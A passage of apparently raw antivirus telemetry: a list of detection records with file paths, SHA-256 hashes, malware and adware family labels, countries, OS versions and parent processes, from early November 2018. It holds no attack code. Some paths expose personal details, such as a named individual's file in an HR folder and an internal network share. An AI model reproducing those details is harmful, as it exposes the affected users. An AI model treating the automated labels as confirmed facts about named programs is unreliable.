  Row(detection=Row(filename='72a55fb04df96203c636a52aa2824c07558e785be34e646fe3749ee2a19eb26b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\72A55FB04DF96203C636A52AA2824C07558E785BE34E646FE3749EE2A19EB26B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='72a55fb04df96203c636a52aa2824c07558e785be34e646fe3749ee2a19eb26b', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:44:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000282b4', filepath='C:\\Windows\\Temp\\96471c11-35d4-4dc9-ad1d-2aa0b87bc74b\\tmp000002e4\\tmp000282b4', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T15:09:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221548-620b594b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221548-620B594B', filesize=64000, name='TR/Siggen.64000.1.#M1.#R1'), hash='bff6eb442a00089abb08a519e3dc447241e8a0d37685002cf8a6c6f62e9fc6a1', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:15:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-222445-b328a625', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-222356-ABC2D34B\\AVSCAN-20181102-222445-B328A625', filesize=64000, name='TR/Agent.64000.23.#M1.#R1'), hash='761b1923e551a80eff514946add04f60da41d61100452d30ba6f76d5ebb76cbe', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:24:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hahjifsu.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\HAhJifsu.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:12:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='idlemonitor.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\{QUFHK-NZMSK-GVF6K-OYUUZ-3DLD3-8ULCA}\\idlemonitor.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:40:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-141522-92be11fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_41457ca7\\AVSCAN-20181102-141508-90BCB851\\AVSCAN-20181102-141522-92BE11FD', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T13:15:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='9c8d0a43aa95e439cede9b69cacfb3c606381bfd6745111c5cfe73a38af9ae38', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-02T08:42:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='winspool.drv', filepath='C:\\Windows\\SysWOW64\\winspool.drv', filesize=320000, name='TR/Crypt.XPACK.Gen7.#M300.#R602680'), hash='b1a9b2ef000917214c0198958cbd239d1d91b1720ec40df041262a34d302ad74', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:28:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dcf450042768a756fa4c535571d1bc239800d911', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\dcf450042768a756fa4c535571d1bc239800d911', filesize=2112000, name='Adware/DealPly.c80ecc.#M1.#R1'), hash='c80ecc2af79cae96b54a857744a3b37d9708eced304e6e3d36168c4a6bedc49c', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:34:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsiBFD1.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\fotor_3.41.exe', parentsize=268416568, timestamp='2018-11-02T09:13:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='skincrafterdll.dll', filepath='E:\\easy driver\\Easy.Driver.Packs.v5.2.5.5.Win7.32-Bit\\Files\\SkinCrafterDll.dll', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='f12867176ab630fb6925b49833ca53fbea560bccf47fa70463a8eaca149906f7', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T11:18:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dxfix.exe', filepath='\\\\ts-xelcea\\share\\vecchio pc dino\\hd vecchio pc\\programmi\\autocad r14\\BONUS\\UTILS\\dxfix.exe', filesize=64000, name='W32/Stanit.#M1.#R1'), hash='e4b7d54a5292b319160bb1999b862d86a5d61b20249d7bae1562ba9cc8b52bcd', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:tJAfutT8U0ao\\\\\\/TyB.1', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T08:32:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='droplet template.exe', filepath='C:\\Program Files\\Adobe\\Adobe Photoshop CS2\\Required\\Droplet Template.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='d3050b412e2913a0a912ffa0d79ab149a148e4f2cf624d8a2de34b0edb5d8bb3', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T01:56:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{79D0F056-39DE-4FDD-83FD-1554CE2C6443}\\setup.exe', filesize=892000, name='W32/Sality.AW.#M1.#R1'), hash='9b83e17cb032b8ecc38e3a03738583b90281148c402d2a621b62fbc543bcafe6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T20:51:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\goyeegboaoh\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='AZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:33:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='afuwin.exe', filepath='C:\\PROGRAM FILES (X86)\\ASUS\\AI SUITE II\\MyLogo\\PEUPDATER\\Compal\\32\\afuwin.exe', filesize=336000, name='W32/Sality.AT.#M1.#R1'), hash='e927bbfdacb9a43c2840620ea4b74d3fc1ee0fbf1c74cd77f0e6a5ea81d2d2b8', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:10:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='давлетшин н.х.exe', filepath='D:\\документы\\Документы отдела кадров\\БГМУ\\Анкеты и заявка на 2015 год\\Давлетшин Н.Х.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='fd3adfe5baf382fb94fff375be717ca38dc4954f5c595c53d065e346fe458879', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-02T05:52:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='common.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\COMMON\\COMMON.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='928ff71a795c02629c8ae50f06db366f3c19969ff50708ea4316dd1ec29c00cc', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110824-cb256e86', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6ecee166\\AVSCAN-20181102-110735-C33353C8\\AVSCAN-20181102-110824-CB256E86', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='d146370124aef2293ad1d5a50803badc58c645779e423317d330c705ea055319', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cardrecovery.exe', filepath='\\\\10.255.111.86\\d$\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\CardRecovery.exe', filesize=64000, name='BDS/Rogue.766012.#M1.#R1'), hash='d809a1cf78a0751b6980abcbb83f400d51e369658aefe4ec3acc97bf43fd79af', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T06:22:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='e9f7f16dd307f468c3c2d5904537ec334b9e95f5', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\e9f7f16dd307f468c3c2d5904537ec334b9e95f5', filesize=320000, name='Adware/DealPly.c83b23.#M1.#R1'), hash='c83b23c2f0fff51a0a70ce0b09a4c942b07da63cd80bff5c50c04e461a71d943', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:09:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00290d38', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00290d38', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:41:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002965f9', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002965f9', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:24:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='keygen.exe', filepath='F:\\Program Files\\REAPER\\Keygen.exe', filesize=64000, name='TR/Rogue.7547256.#M1.#R1'), hash='d8f3b8709ebc205cb05e8cb0bfb9c041b8eebd0e2825b6b71d1d265f77117514', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:19:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='sculpteouploader.exe', filepath='E:\\Program Files\\Pixologic\\ZBrush 4R8\\ZStartup\\ZPlugs64\\SculpteoData\\Uploader\\SculpteoUploader.exe', filesize=5000000, name='HEUR/AGEN.1028299.#M1.#R1'), hash='b6eec48c274983f3fd910068c1587c2491d810594440a0551dc5d9c577949d3b', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Software\\3D\\Zbrush\\Pixologic.ZBrush.4R8.P2.Update.Only\\ZBrush_4R8_P2_Updater.exe', parentsize=111780192, timestamp='2018-11-04T19:45:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-090332-ae9a27be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96100e26\\AVSCAN-20181104-085413-64085A6C\\AVSCAN-20181104-090332-AE9A27BE', filesize=896000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:03:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023cb98', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023cb98', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:39:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029799b', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029799b', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:51:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023aee8', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023aee8', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:08:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msmdownloadtool.exe', filepath='C:\\Users\\X\\Desktop\\oppo a71\\CPH1801EX_11_A.01_171230\\MsmDownloadTool.exe', filesize=22812000, name='W32/Ramnit.C.#M1.#R1'), hash='ed1a0b7c77cde353e315572d6bb1d972bd2bf2223e28376444a69223b99318ad', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe24_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe24 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T10:01:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:40:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-090235-08ba32f4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_00280162\\AVSCAN-20181104-090211-05494FF3\\AVSCAN-20181104-090235-08BA32F4', filesize=832000, name='TR/Snarasite.ME.15.#M1.#R1'), hash='fea6e6814f6c07f0cbc5e609755c7131cf91ccff7843eb7ad6653c8c99b9d2e8', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T08:02:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-031647-460e49dc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_90189271\\AVSCAN-20181104-031548-3968D925\\AVSCAN-20181104-031647-460E49DC', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T01:18:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181101-174803-1e271f4f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0845e96a\\AVSCAN-20181101-174645-0FEFE8A3\\AVSCAN-20181101-174803-1E271F4F', filesize=660000, name='PUA/MediaGet.Gen5.#M300.#R400493'), hash='fefefd774d1ba5efc46a0f4273ef0265b4f8460f63f7bffd10b366b368de38eb', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:48:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res0301_newmm[3].exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[3].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:25:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='вкр.exe', filepath='C:\\Users\\X\\Desktop\\кнспекты\\вкр\\вкр.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='fd3adfe5baf382fb94fff375be717ca38dc4954f5c595c53d065e346fe458879', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:NlWAMzOFmEG6hVkn.1', country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T15:19:20Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='reg.exe', filepath='E:\\WINDOWS\\system32\\reg.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='484fe1059b13b83fe1a3d923164822720122717439d4069c9595ee7eb13f51d5', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:18:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='docs.scr', filepath='D:\\DOKUMENKU\\PPATK\\Grips-CTR-Client\\platform\\docs\\docs.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:27:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='minesweeper.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\amd64_microsoft-windows-s..oxgames-minesweeper_31bf3856ad364e35_6.1.7600.16385_none_fe560f0352e04f48\\MineSweeper.exe', filesize=896000, name='TR/Patched.Ren.Gen.#M300.#R7331'), hash='04768c1bf5790790728ee3c6379ca9511c3dfc98a6421dd8fa8e8314d7c1da77', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:39:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='6a46105ce6c5715cb66fd699308dadd2463b29911a5bde6738f4c82f64d45177', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\6A46105CE6C5715CB66FD699308DADD2463B29911A5BDE6738F4C82F64D45177', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='6a46105ce6c5715cb66fd699308dadd2463b29911a5bde6738f4c82f64d45177', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:10:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:09:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T20:45:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nvidia-forced-10x64-416.16-dis.exe', filepath='D:\\Users\\X\\AppData\\Roaming\\IDM\\DwnlData\\Reza\\nVidia-FORCED-10x64-416.16-Dis_23\\nVidia-FORCED-10x64-416.16-Dis.exe', filesize=43580000, name='HEUR/AGEN.1034275.#M1.#R1'), hash='5b2a75cec743479310d9afacb81942446e5de86d67ad226296464c572e1ff459', metadata=Row(cmdline='\\\\\\/onboot', country='IR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Program Files (x86)\\Internet Download Manager\\IDMan.exe', parentsize=3986544, timestamp='2018-11-02T12:38:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='118242fcdbe10a1485d5ee33f315c7667607ee92d95468e637c38b27529b6fcd', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T17:01:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160149-f91afac7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-160149-F91AFAC7', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:01:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-232122-1b091ac5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a82ae42a\\AVSCAN-20181102-224112-BD43C1FB\\AVSCAN-20181102-232122-1B091AC5', filesize=2988000, name='TR/Injector.oqpvn.#M1.#R1'), hash='1925d43aef01e3b7d96cd09bdfbd05515ca4c9305685c3997990be1e72f314f1', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:21:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-184630-5da0e05e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e1cb6d92\\AVSCAN-20181102-184104-3026B999\\AVSCAN-20181102-184630-5DA0E05E', filesize=128000, name='TR/Crypt.XPACK.xjjbh.#M1.#R1'), hash='2351fb3f6ae72db120e54d1885e58b50305b1a91cb5db2bcf8b9866acf409df2', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:46:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T22:44:34Z'), dt=datetime.date(2018, 11, 2)),
